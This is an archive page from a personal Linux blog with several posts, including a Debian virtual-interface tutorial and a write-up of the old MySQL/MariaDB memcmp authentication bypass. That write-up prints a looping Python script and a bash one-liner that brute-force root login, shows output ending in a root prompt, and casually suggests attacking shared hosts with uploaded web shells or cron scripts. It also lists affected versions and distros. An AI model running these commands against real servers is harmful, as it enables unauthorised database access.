web analytics

Cat Can Talk!

You don’t believe? I am a cat, and I am talking to you now!

Archive for the ‘Ubuntu’ Category

Happy SysAdmin Day!

The image above already stated all.
Happy SysAdmin Day to all system administrator!
I know becoming a SysAdmin is a very though job. Trust me, I know.
We work like hell, 24/7 standby, even during sleeping time, if there is a call, we have to wake up and bring up the network/server/infra.
Without us, those expensive servers and network equipment will just be something useless.
We are powerful! We are the “root”!
May the force be with you!
Happy SysAdmin Day!

Debian Logo

As a Linux user, and a Debian lover, I tends to use the OS using commands a lot.
Why not use Ubuntu? I use Ubuntu on my desktops, and on servers, I prefer Debian or CentOS.
Anyway, in Linux, not everything you can do it quickly and in a simple way using the GUI.
CLI is always the best way to do most of the things you want.
This post, I will teach you how to create a virtual network interface in your Debian based Linux, which means, Ubuntu users can use this as well.

Debian based Linux store the network interface config in the file /etc/network/interfaces.
No, it is not in /etc/sysconfig/network-scripts/. Only Red Hat family distro use this.

By default, you might see the entries such as below in your /etc/network/interfaces.

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.1.5
netmask 255.255.255.0
gateway 192.168.1.254

Just edit it using nano or vi, or if you have a desktop GUI, you can use your preferred text editor instead.
Things that you need to add, is as below for an additional virtual network interface.

auto eth0:1
iface eth0:1 inet static
address 192.168.1.6
netmask 255.255.255.0
broadcast 255.255.255.0
gateway 192.168.1.254

So the file, will become as below:

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.1.5
netmask 255.255.255.0
gateway 192.168.1.254

auto eth0:1
iface eth0:1 inet static
address 192.168.1.6
netmask 255.255.255.0
broadcast 255.255.255.0
gateway 192.168.1.254

After you have done this, just restart the network using the command:

/etc/init.d/networking restart

Or if your OS is using NetworkManager, use the command below:

/etc/init.d/NetworkManager restart

If you prefer to use the “service” command, just go ahead with:

service networking restart

or for NetworkManager:

service NetworkManager restart

No reboot is required.


Ever wonder how izzit looks like underneath the interface of your Android phone?
Here is how it looks like, inside my Samsung Galaxy 5 running Cyanogenmod 7.2, which is Android Gingerbread (2.3.7).
android shell

MySQL Logo

Well, it is funny that when you try to attempt to login into mysql(with CLI) root user with the wrong password for 300 to 512 times, it will just finally just you login as the root user, with the wrong password.

Vulnerable versions of MySQL and MariaDB are those compiled with libraries that return integers outside the -128 to 127 range for memcmp. According to Golubchik the gcc built in memcmp and BSD libc memcmp are safe, but the linux glibc sse-optimised memcmp is not safe.

Official builds from MySQL(Oracle), MariaDB are believe to be not vulnerable, but up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22, are potentially vulnerable.
5.1.63 and 5.5.24, which was just release recently have been verified that they do not have this hole.

Perhaps the proverb “When you fail, try again. Try harder until you success” is true after all in MySQL.
LOL

I’ve read from here, it shows you how to gain the root access of MySQL, using just a 1 line command python script.

#!/usr/bin/python
import subprocess

while 1:
subprocess.Popen(“mysql -u root mysql –password=blah”, shell=True).wait()

Below running the command:

relik@stronghold:~# python mysql_bypass.py
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
(The same shits happens for around 300 over times between these)
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql>

And if you prefer to just do it manually inside the shell, you may want to try this as well.

$ for i in `seq 1 512`; do echo ‘select @@version;’ | mysql -h 127.0.0.1 -u root mysql –password=X 2>/dev/null && break; done

How To Fuck The Hole?
So, in order to exploit this hole, the attacker must have access to the MySQL server. Or at least, any type of account on the server, such as shell account or a hosting account.
So if your MySQL port is open for remote access, there are very high possibility that you are fucked!

If you currently having a shared hosting account, you might be able to screw the host off with several ways below:
1. If the host did not disable shell_exec, then you can actually upload an AJAX shell script to play with it.
2. shell_exec disabled? But you can create a cron? Then upload a bash script and let the cron execute the bash script to do the work for you.
And be expected that the host ban your ass after you play with this shit.

I Am Using MySQL Too! So, Am I Fucked!?
Well, it depends.
According to what I read from here, not all Linux distros are affected.
According to HD Moore, the only affected distros that are found to have the fucked versions of MySQL in their repo are as below:
1. Ubuntu 64bit (10.04, 10.10, 11.04, 11.10 and 12.04) Start from 1 LTS version, until the latest LTS version.
2. OpenSuSE 12.1 64-bit (So far only 1 version found to have hole.)
3. Fedora 16 64-bit (So far only 1 version found to have hole.)
4. Arch Linux

So, MySQL from which distro’s repo are proven to be safe at the moment?
They are as below:
1. Debian (Yeah! Luke, I am your father! )
2. RHEL (Well, still worth to pay for its subscription in this case.)
3. CentOS (The exact same thing as RHEL without need to pay a single cent, so I take back my words at the line above.)
4. Gentoo (Well, it is indeed very solid.)
5. All other distros.

So far only builds from 4 distros listed at above are found to be fucked without condom, so, I am very sure that I am not fucked, as I don’t use any of those 4 affected distros in any of my servers at the moment.

If you are not hosting other people in your server, please lock your MySQL port to be accessing from outside.
If you are leaving the port open, then please tell me which distro you are using for your server and tell me its IP, I go and pay you a visit.

Just watched some video in Youtube, and found that it is quite interesting, so I just share it here.
As you all know, the most busy websites on the Internet, are Google and Facebook.

The videos below, are showing their main data center.
And no, they do not use only 1 data center, they have servers around the world, and the videos below, are only showing their main data center only.

Facebook Data Center

Google Data Center